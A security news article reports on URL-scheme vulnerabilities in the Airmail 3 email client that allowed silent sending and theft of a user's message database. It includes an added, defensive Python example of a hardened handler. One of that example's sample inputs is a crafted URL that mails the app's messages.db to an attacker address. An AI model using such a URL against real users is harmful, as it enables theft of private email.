
URL scheme vulnerabilities patched in Airmail 3 email client


Developers behind the Airmail 3 email client for iPhone and Mac OS X have issued a software update after researchers from the security firm Versprite used reverse engineering to find vulnerabilities in its URL scheme.

In a highly technical report, Versprite explains that the URL its experts examined for Airmail's "send message" command has only one parameter that requires prior knowledge: the "account" parameter, which determines which configured Airmail account will send the message. However, "Based on our observations, an account name is equal to the account's associated email address by default. In addition, Airmail's 'send' command does not require re-authentication. Not only does this allow local applications to send emails through Airmail's URL scheme, but it also introduces a dangerous phishing primitive."

Versprite also warns that because Airmail renders HTML content within emails, an attacker can trigger the "send" command via a hyperlink placed in an email. "Modern applications should typically request permission from the user prior to forwarding requests to custom URL handlers," the report states. "Unfortunately, permission is not requested by Airmail, and the user is not prompted when the handler processes the 'send' command. Instead, Airmail will instantly send an attacker crafted email from the target account. At first glance, this may seem like a negligible issue, but this attack becomes much more concerning when file attachments are considered."

Among other issues, the researchers noted that Airmail stores its email messages in a local database whose path is "relatively deterministic." Consequently, an attacker can craft a payload that "exfiltrates a user's emails by attaching this database to an email sent to themselves."
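The three weaknesses described above (a "send" command whose only secret is a guessable account name, a handler that executes it without prompting, and attachment paths that can point at the app's own message store) are all failures of the URL-scheme handler to gate a privileged action. The following is an added illustration of how such a handler can be hardened; it is not Airmail's code and not from the Versprite report. The scheme name `mailapp`, the `account`, `to` and `attachment` parameters, and the directory paths are assumptions chosen for the example.

```python
from pathlib import Path
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

# Illustrative only: the scheme, command and parameter names are assumptions
# for this example, not Airmail's actual URL format.
SCHEME = "mailapp"
PRIVILEGED_COMMANDS = {"send"}

# Constructed paths for the example. APP_DATA_DIR stands in for the app's own
# message database directory; ATTACH_DIR is the only place a URL-triggered
# send may read attachments from. Neither needs to exist for the checks to run.
APP_DATA_DIR = Path("/Users/alice/Library/Application Support/MailApp").resolve()
ATTACH_DIR = Path("/Users/alice/Outbox").resolve()


class RejectedURL(Exception):
    """Raised when a URL-scheme request must not be executed."""


def parse_command(url: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split 'mailapp://send?account=...&attachment=...' into command and params.

    parse_qs keeps every occurrence of a key, so repeated attachment=
    parameters are all returned and all get checked.
    """
    parts = urlparse(url)
    if parts.scheme != SCHEME:
        raise RejectedURL(f"unexpected scheme {parts.scheme!r}")
    command = parts.netloc or parts.path.strip("/")
    params = parse_qs(parts.query, keep_blank_values=True)
    return command, params


def attachment_allowed(path_str: str) -> bool:
    """Accept a file only if it resolves to a location inside ATTACH_DIR.

    resolve() normalises '..' and follows existing symlinks, so a traversal
    such as '/Users/alice/Outbox/../Library/...' does not pass the check.
    A deterministic path into the app's message store is therefore rejected
    regardless of how it is written.
    """
    resolved = Path(path_str).resolve()
    try:
        resolved.relative_to(ATTACH_DIR)
    except ValueError:
        return False
    return True


def handle_url(
    url: str, confirm: Callable[[str, Dict[str, List[str]]], bool]
) -> Tuple[str, Dict[str, List[str]]]:
    """Dispatch a URL-scheme request.

    Anything that sends mail is gated twice: attachment paths are validated,
    then the user must approve the request through `confirm`, which in a real
    client would be a dialog showing the sending account, recipients and
    attachments. A send is never executed silently, and knowing the account
    name alone is not enough to trigger it.
    """
    command, params = parse_command(url)
    if command not in PRIVILEGED_COMMANDS:
        return command, params  # e.g. opening a message: no side effects
    for attachment in params.get("attachment", []):
        if not attachment_allowed(attachment):
            raise RejectedURL(f"attachment outside {ATTACH_DIR}: {attachment}")
    if not confirm(command, params):
        raise RejectedURL("user declined the request")
    return command, params


if __name__ == "__main__":
    # Constructed sample requests: one legitimate, one that tries to mail the
    # app's own message database to an attacker-controlled address.
    ok = ("mailapp://send?account=alice@example.com&to=bob@example.com"
          "&attachment=/Users/alice/Outbox/report.pdf")
    bad = ("mailapp://send?account=alice@example.com&to=attacker@example.net"
           "&attachment=/Users/alice/Library/Application%20Support/MailApp/messages.db")
    print(handle_url(ok, lambda cmd, p: True))
    try:
        handle_url(bad, lambda cmd, p: True)
    except RejectedURL as err:
        print("blocked:", err)
```

The order of the checks matters: path validation runs before the confirmation prompt so that a user who habitually clicks "OK" still cannot be tricked into attaching the message store. In a shipping client the `confirm` callback would also record where the URL came from (another app, or a link inside a rendered message), since the report's phishing scenario depends on the handler accepting links from email content without distinction.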

In its latest software update, Airmail, which is owned by the Italian company Bloop SRL, describes the fix for these issues only as a "potential URL scheme vulnerability fix."

Bradley Barth

As director of multimedia content strategy at CyberRisk Alliance, Bradley Barth develops content for online conferences, webcasts, podcasts video/multimedia projects — often serving as moderator or host. For nearly six years, he wrote and reported for SC Media as deputy editor and, before that, senior reporter. He was previously a program executive with the tech-focused PR firm Voxus. Past journalistic experience includes stints as business editor at Executive Technology, a staff writer at New York Sportscene and a freelance journalist covering travel and entertainment. In his spare time, Bradley also writes screenplays.
